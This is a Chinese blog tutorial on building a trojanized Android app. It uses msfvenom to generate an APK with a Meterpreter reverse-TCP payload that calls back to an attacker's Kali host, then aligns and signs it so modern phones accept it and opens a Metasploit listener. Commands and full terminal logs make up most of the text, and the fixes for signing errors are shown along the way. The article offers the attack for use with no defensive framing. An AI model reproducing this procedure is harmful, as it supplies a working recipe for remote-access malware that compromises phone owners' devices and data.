IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		图片批量下载器
↓批量下载图片,美女图库↓ 		图片自动播放器
↓图片自动播放器↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 移动开发 -> 安卓渗透控制 -> 正文阅读

[移动开发]安卓渗透控制

一:生产apk安卓应用

1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。
lhost=192.168.183.12 (这是Kali的IP)lport=55555 (默认4444,可以自定义)

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk

这样,一个很简单的带有payload(攻击载荷)的安卓应用就生成好了。ls -l看一下,在当前目录下有个t.apk文件。

很多同学看百度搜索到的教程都是到这里就直接丢到安卓手机里安卓了,然后就一值连不上。。。那是上古时期的教程了,咱们身边都没有这么老旧的手机。在这里,我们还要对t.apk文件进行优化对齐然后签名。
需要用到的软件有三个,zipalign, keytool , apksigner。
Kali 2020只默认安装了一个keytool,有些教程里提到jarsigner,实际上kali2020已经没有这个了,软件源里也没有,ap-get install jarsigner也会提示没有这个软件。这是apk应用V1签名需要的工具。我这里用apksigner的V2签名,V1和V2的签名流程不同,请勿生搬硬套。
这部分的知识想理解的,建议百度搜索zipalign


2,使用zipalign对apk进行对齐

zipalign -v 4 t.apk tz.apk

3,生成密钥对

生成密钥对:
keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
解释:
keytool -genkeypair -keystore 密钥库名 -alias 密钥别名 -validity 天数 -keyalg RSA

?4,对apk签名

签名:
apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk
解释:
apksigner sign --ks 密钥库名 --ks-key-alias 密钥别名 tz.apk

5,对apk进行签名验证

apksigner verify -v --print-certs tz.apk

到这里,基本就可以了。最后生成的文件tz.apk就是我们要的安卓应用

安卓控制全部

root@kali:~# msfconsole
msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  55555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf5 exploit(multi/handler) > set lhost 192.168.183.12
lhost => 192.168.183.12
msf5 exploit(multi/handler) > exploit

[-] Handler failed to bind to 192.168.183.12:55555:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444

?生成apk阶段全部

生成apk阶段全部
root💀kali)-[/home/kali/Desktop]
└─# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.183.12 lport=55555 R > t.apk

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10190 bytes

                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# zipalign -v 4 t.apk tz.apk

Command 'zipalign' not found, but can be installed with:
apt install zipalign
Do you want to install it? (N/y)y
apt install zipalign
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog
  android-libunwind android-libutils android-libziparchive libzopfli1
The following NEW packages will be installed:
  android-libbacktrace android-libbase android-libcutils android-liblog
  android-libunwind android-libutils android-libziparchive libzopfli1 zipalign
0 upgraded, 9 newly installed, 0 to remove and 567 not upgraded.
Need to get 548 kB of archives.
After this operation, 1,726 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-liblog amd64 1:10.0.0+r36-7 [44.4 kB]
Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbase amd64 1:10.0.0+r36-7 [41.5 kB]
Get:3 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libunwind amd64 10.0.0+r36-4 [48.3 kB]
Get:4 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libbacktrace amd64 1:10.0.0+r36-7 [153 kB]
Get:5 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libcutils amd64 1:10.0.0+r36-7 [33.3 kB]
Get:6 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libutils amd64 1:10.0.0+r36-7 [62.4 kB]
Get:7 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 android-libziparchive amd64 1:10.0.0+r36-7 [35.5 kB]
Get:8 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libzopfli1 amd64 1.0.3-1 [101 kB]
Get:9 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 zipalign amd64 1:10.0.0+r36-1 [28.2 kB]
Fetched 548 kB in 1s (449 kB/s)
Selecting previously unselected package android-liblog.
(Reading database ... 268182 files and directories currently installed.)
Preparing to unpack .../0-android-liblog_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-liblog (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libbase.
Preparing to unpack .../1-android-libbase_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbase (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libunwind.
Preparing to unpack .../2-android-libunwind_10.0.0+r36-4_amd64.deb ...
Unpacking android-libunwind (10.0.0+r36-4) ...
Selecting previously unselected package android-libbacktrace.
Preparing to unpack .../3-android-libbacktrace_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libbacktrace (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libcutils.
Preparing to unpack .../4-android-libcutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libcutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libutils.
Preparing to unpack .../5-android-libutils_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libutils (1:10.0.0+r36-7) ...
Selecting previously unselected package android-libziparchive.
Preparing to unpack .../6-android-libziparchive_1%3a10.0.0+r36-7_amd64.deb ...
Unpacking android-libziparchive (1:10.0.0+r36-7) ...
Selecting previously unselected package libzopfli1.
Preparing to unpack .../7-libzopfli1_1.0.3-1_amd64.deb ...
Unpacking libzopfli1 (1.0.3-1) ...
Selecting previously unselected package zipalign.
Preparing to unpack .../8-zipalign_1%3a10.0.0+r36-1_amd64.deb ...
Unpacking zipalign (1:10.0.0+r36-1) ...
Setting up android-liblog (1:10.0.0+r36-7) ...
Setting up libzopfli1 (1.0.3-1) ...
Setting up android-libunwind (10.0.0+r36-4) ...
Setting up android-libbase (1:10.0.0+r36-7) ...
Setting up android-libziparchive (1:10.0.0+r36-7) ...
Setting up android-libcutils (1:10.0.0+r36-7) ...
Setting up android-libbacktrace (1:10.0.0+r36-7) ...
Setting up android-libutils (1:10.0.0+r36-7) ...
Setting up zipalign (1:10.0.0+r36-1) ...
Processing triggers for libc-bin (2.32-4) ...
Processing triggers for man-db (2.9.4-2) ...
Processing triggers for kali-menu (2021.4.2) ...
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# keytool -genkey -v -keystore cg.keystore -alias cg -keyalg RSA -keysize 2048 -validity 10000
Enter keystore password:  
Re-enter new password: 
What is your first and last name?
  [Unknown]:  jackson
What is the name of your organizational unit?
  [Unknown]:  jackson
What is the name of your organization?
  [Unknown]:  jackson
What is the name of your City or Locality?
  [Unknown]:  jackson
What is the name of your State or Province?
  [Unknown]:  jackson
What is the two-letter country code for this unit?
  [Unknown]:  22
Is CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22 correct?
  [no]:  y

Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
        for: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22
[Storing cg.keystore]
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk
Command 'apksigner' not found, but can be installed with:
apt install apksigner
Do you want to install it? (N/y)y
apt install apksigner
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  libapksig-java
The following NEW packages will be installed:
  apksigner libapksig-java
0 upgraded, 2 newly installed, 0 to remove and 567 not upgraded.
Need to get 847 kB of archives.
After this operation, 980 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 libapksig-java all 31.0.2-1 [404 kB]
Get:2 http://mirrors.ustc.edu.cn/kali kali-rolling/main amd64 apksigner all 31.0.2-1 [443 kB]
Fetched 847 kB in 1s (1,115 kB/s)
Selecting previously unselected package libapksig-java.
(Reading database ... 268245 files and directories currently installed.)
Preparing to unpack .../libapksig-java_31.0.2-1_all.deb ...
Unpacking libapksig-java (31.0.2-1) ...
Selecting previously unselected package apksigner.
Preparing to unpack .../apksigner_31.0.2-1_all.deb ...
Unpacking apksigner (31.0.2-1) ...
Setting up libapksig-java (31.0.2-1) ...
Setting up apksigner (31.0.2-1) ...
Processing triggers for kali-menu (2021.4.2) ...
Processing triggers for man-db (2.9.4-2) ...
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk                              127 ?

Exception in thread "main" java.io.FileNotFoundException: tz.apk (No such file or directory)
        at java.base/java.io.RandomAccessFile.open0(Native Method)
        at java.base/java.io.RandomAccessFile.open(RandomAccessFile.java:345)
        at java.base/java.io.RandomAccessFile.<init>(RandomAccessFile.java:259)
        at java.base/java.io.RandomAccessFile.<init>(RandomAccessFile.java:214)
        at com.android.apksig.ApkVerifier.verify(ApkVerifier.java:143)
        at com.android.apksigner.ApkSignerTool.verify(ApkSignerTool.java:516)
        at com.android.apksigner.ApkSignerTool.main(ApkSignerTool.java:88)
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# zipalign -v 4 t.apk tz.apk                                              1 ?

Verifying alignment of tz.apk (4)...
      49 AndroidManifest.xml (OK - compressed)
    1779 resources.arsc (OK - compressed)
    1992 classes.dex (OK - compressed)
    8160 META-INF/ (OK)
    8210 META-INF/MANIFEST.MF (OK - compressed)
    8447 META-INF/SIGNFILE.SF (OK - compressed)
    8713 META-INF/SIGNFILE.RSA (OK - compressed)
Verification successful
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk

DOES NOT VERIFY
ERROR: JAR signer SIGNFILE.RSA: JAR signature META-INF/SIGNFILE.RSA uses digest algorithm SHA-256 and signature algorithm RSA which is not supported on API Level(s) 10-17 for which this APK is being verified
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner sign --ks cg.keystore --ks-key-alias cg tz.apk                1 ?
Keystore password for signer #1: 
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─# apksigner verify -v --print-certs tz.apk

Verifies
Verified using v1 scheme (JAR signing): true
Verified using v2 scheme (APK Signature Scheme v2): true
Verified using v3 scheme (APK Signature Scheme v3): true
Verified using v4 scheme (APK Signature Scheme v4): false
Verified for SourceStamp: false
Number of signers: 1
Signer #1 certificate DN: CN=jackson, OU=jackson, O=jackson, L=jackson, ST=jackson, C=22
Signer #1 certificate SHA-256 digest: 0b0d4e001cd8419178570d9b654a4e12c04a5fd6b43ddba495cbe3c3daca25ad
Signer #1 certificate SHA-1 digest: 098dabd0918e21cc5f3d5315a476b64199835f51
Signer #1 certificate MD5 digest: 285862ef117e8115197d25f937e51de9
Signer #1 key algorithm: RSA
Signer #1 key size (bits): 2048
Signer #1 public key SHA-256 digest: 599dac27b2c16dde82fe2911857746cce415ea8cd1932aa0f3d70c185df3b059
Signer #1 public key SHA-1 digest: 6560ca068e18184624c0e40a32b5f075ed114a76
Signer #1 public key MD5 digest: be0f581cf0cec32e300f49098271b435
                                                                                
┌──(root💀kali)-[/home/kali/Desktop]
└─#

  移动开发 最新文章
Vue3装载axios和element-ui
android adb cmd
【xcode】Xcode常用快捷键与技巧
Android开发中的线程池使用
Java 和 Android 的 Base64
Android 测试文字编码格式
微信小程序支付
安卓权限记录
知乎之自动养号
【Android Jetpack】DataStore
上一篇文章      下一篇文章      查看所有文章
加:2022-02-04 11:08:59  更:2022-02-04 11:09:10 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 14:01:08-

图片自动播放器
↓图片自动播放器↓ 		TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓ 		图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码